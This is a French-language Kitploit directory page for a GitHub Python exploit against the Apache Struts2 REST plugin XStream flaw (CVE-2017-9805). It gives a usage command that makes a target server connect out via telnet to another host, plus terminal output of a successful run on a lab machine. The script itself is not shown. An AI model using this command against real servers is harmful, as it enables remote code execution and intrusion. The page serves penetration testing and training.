Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-CVE-2017-9805- — Script d'exploitation pour Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | Kitploit
Outils/GitHubGitHub/jongmartinez/-cve-2017-9805-
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubjongmartinez/-cve-2017-9805-

-CVE-2017-9805-

Script d'exploitation pour Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)

Voir le dépôt
1il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Informations sur la vulnérabilité

Ressources : * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

Qu'est-ce que c'est ?

Un script d'exploit Python capable d'exécuter des commandes à distance dans le shell d'un système hébergeant un Struts2 vulnérable à S2-052.

Utilisation

python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
root@kitploit:~
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Testé sur la machine vulnérable pentesterlab de l'exercice s2-052.

Télécharger l’outil